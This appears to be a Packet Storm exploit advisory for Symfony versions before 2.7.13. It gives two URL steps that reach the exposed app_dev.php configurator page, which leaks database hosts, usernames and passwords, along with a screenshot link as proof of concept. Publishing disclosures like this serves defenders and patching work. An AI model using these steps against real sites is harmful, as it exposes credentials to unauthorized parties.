Symfony versions prior to 2.7.13 suffer from a remote information disclosure vulnerability when app_dev is enabled.
baa4cb71d8a7e687f3f227e5d3b231e472d19e18576f68e684b2fa07658110b1# Exploit Title: Symfony < 2.7.13 - Remote information Disclosure
# Google Dork: N/A
# Date: 6/27/2018
# Exploit Author: Abdeljalil Nouiri (pwny)
# Author Mail : abdel001nouiri[at]gmail[dot]com
# Vendor Homepage: https://www.symfony.com/
# Version: 2.7.13
# Tested on: Win10 x64, Ubuntu
# Exploit :
-STEP 1:
This Vulnerability Will Work if the "app_dev" isn't disabled
url : https://localhost/app_dev.php/
-STEP 2:
the last step of symfony configuration still accessible , this would leak
all information including ( database host/user/password ... etc)
url :https://localhost/app_dev.php/_configurator/final
# POC :
http://prntscr.com/kbuua8
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed